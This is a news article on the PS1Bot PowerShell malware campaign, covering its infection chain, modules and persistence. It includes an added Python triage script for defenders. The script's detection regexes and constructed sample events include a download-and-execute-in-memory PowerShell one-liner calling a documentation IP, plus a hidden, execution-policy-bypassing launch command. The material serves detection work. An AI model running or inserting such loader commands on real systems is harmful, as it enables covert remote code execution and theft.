Malicious Advertising Strategy Deploys Modular PowerShell Malware Known as PS1Bot
A new modular malware framework named PS1Bot has recently emerged and drawn the attention of security researchers. The campaign distributing it, observed since 2025 and still ongoing, shares design similarities with the AHK Bot malware family.
According to Talos, Cisco's threat intelligence and research group, PS1Bot is a PowerShell-based framework that, once executed, retrieves a PowerShell script from a command-and-control (C2) server. That script polls the server for further modules, which are executed in memory rather than written to disk, leaving few artefacts for forensic analysis.
The infection chain begins when a victim downloads a compressed archive through a malicious advertisement or an SEO-poisoned search result. Each PS1Bot module reports its status back to the attacker over HTTP requests.
Researchers have identified distinct modules for antivirus detection and evasion, screen capture, cryptocurrency wallet and browser data theft, keylogging and clipboard monitoring, system information gathering, and persistence. Persistence is achieved by writing PowerShell scripts and shortcuts that re-enter the C2 loop at system startup.
One of PS1Bot's key components is its keylogger, which uses Windows API hooks to capture keystrokes, mouse events, and clipboard contents. The screen capture module generates JPEG screenshots at runtime, encodes them, and sends them to the C2 server.
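The two behaviours a defender can most readily hunt for from the description above are the download-and-run-in-memory loader (a PowerShell script fetching modules from the C2 and executing them without touching disk) and the Startup-folder persistence (scripts and shortcuts that relaunch the C2 loop at boot). The following is an added example, not Talos code and not PS1Bot code: a small Python triage routine run over constructed Windows telemetry. It assumes PowerShell script block logging is enabled (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and that Sysmon is recording process creation (Event ID 1) and file creation (Event ID 11). The event records, the host path names, and the IP address `198.51.100.7` (a documentation address) are all constructed for the example; the regular expressions are generic indicators, not PS1Bot-specific signatures, and will need tuning against the baseline of a real environment.

```python
"""Triage of Windows telemetry for PS1Bot-style behaviour.

Added example (not Talos or PS1Bot code). Assumptions:
  * Event 4104 = PowerShell script block text (script block logging enabled)
  * Sysmon Event 1 = ProcessCreate, Sysmon Event 11 = FileCreate
  * Events are already parsed into dicts; the samples below are constructed.
"""
import re
from dataclasses import dataclass

# Script-block indicators: something fetched over the network ...
DOWNLOAD_RE = re.compile(
    r"(DownloadString|DownloadData|Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient)", re.I)
# ... and handed straight to an in-memory execution primitive.
INMEM_RE = re.compile(
    r"(Invoke-Expression|\bIEX\b|\[System\.Reflection\.Assembly\]::Load\(|Add-Type)", re.I)
# Per-user and all-users Startup folders: new .lnk or .ps1 files there are
# the persistence artefacts the article describes.
STARTUP_RE = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+\.(lnk|ps1)$", re.I)
# Hidden / policy-bypassing PowerShell launches, typical of a startup shortcut.
LAUNCH_RE = re.compile(
    r"-(w(indowstyle)?\s+hidden|e(p|xecutionpolicy)\s+bypass|e(nc|ncodedcommand)\s)", re.I)


@dataclass
class Finding:
    event_id: int
    rule: str
    detail: str


def analyze(events):
    """Return one Finding per event that matches a rule."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 4104:
            text = ev.get("ScriptBlockText", "")
            if DOWNLOAD_RE.search(text) and INMEM_RE.search(text):
                findings.append(Finding(4104, "ps_download_and_execute_in_memory", text[:80]))
        elif eid == 11:
            target = ev.get("TargetFilename", "")
            if STARTUP_RE.search(target):
                findings.append(Finding(11, "startup_folder_persistence", target))
        elif eid == 1:
            image = ev.get("Image", "").lower()
            cmd = ev.get("CommandLine", "")
            if image.endswith("powershell.exe") and LAUNCH_RE.search(cmd):
                findings.append(Finding(1, "hidden_powershell_launch", cmd))
    return findings


def triage(events, min_rules=2):
    """Flag a host only when several distinct behaviours co-occur.

    A single hidden PowerShell launch or Startup-folder write is common in
    legitimate admin tooling; the combination with an in-memory loader is not.
    """
    findings = analyze(events)
    rules = {f.rule for f in findings}
    return {"suspicious": len(rules) >= min_rules,
            "rules": sorted(rules),
            "findings": findings}


# Constructed sample events for one host (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4104,
     "ScriptBlockText": "$c=New-Object Net.WebClient; IEX $c.DownloadString('http://198.51.100.7/stage')"},
    {"EventID": 4104, "ScriptBlockText": "Get-ChildItem C:\\Users"},
    {"EventID": 11,
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"EventID": 11, "TargetFilename": r"C:\Users\alice\Documents\notes.txt"},
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -w hidden -ep bypass -File C:\Users\alice\AppData\Roaming\x.ps1"},
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
]

if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    print("suspicious:", result["suspicious"], "rules:", result["rules"])
    for f in result["findings"]:
        print(f"  [{f.event_id}] {f.rule}: {f.detail}")
```

The value of this check is in the correlation rather than in any single regular expression: script block logging exposes the module bodies that never reach disk, while the Sysmon file and process events catch the persistence that the article says PS1Bot plants in the Startup folder. Without script block logging enabled, the in-memory stage is invisible to this routine and only the persistence artefacts remain.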
Talos has not observed the Skitnet binary itself in the PS1Bot campaign. There are, however, overlaps in infrastructure, module design, and URL construction between PS1Bot and campaigns distributing Skitnet/Bossnet. Delivery channels reported for this cluster include compromised websites hosting malicious scripts, phishing campaigns, and infected software distribution channels.
The framework's modular design and active development indicate that PS1Bot will keep evolving as its operators add capabilities. Talos assesses that additional, as yet undiscovered PS1Bot modules likely exist.
Because the lure arrives through malvertising and SEO poisoning rather than e-mail, the initial archive reaches the victim through the browser, which complicates detection and prevention for organisations whose controls are focused on mail. Once running, the "grabber" module targets dozens of web browsers and cryptocurrency wallet extensions, searching for files that contain wallet seed phrases or passwords.
The architectural similarities between PS1Bot and AHK Bot, including the use of drive serial numbers to build C2 paths and a modular design that enables rapid updates, further underscore the maturity of this framework.
Individuals and organisations should remain vigilant and take the usual precautions: keep software updated, use reliable security solutions, and be cautious when clicking on advertisements or opening email attachments from unknown sources. For defenders, the behaviours described above suggest more specific checks: enable PowerShell script block logging so that modules that never touch disk are still recorded, monitor the Startup folders for newly created scripts and shortcuts, and apply policy to archives downloaded from advertisements or search results.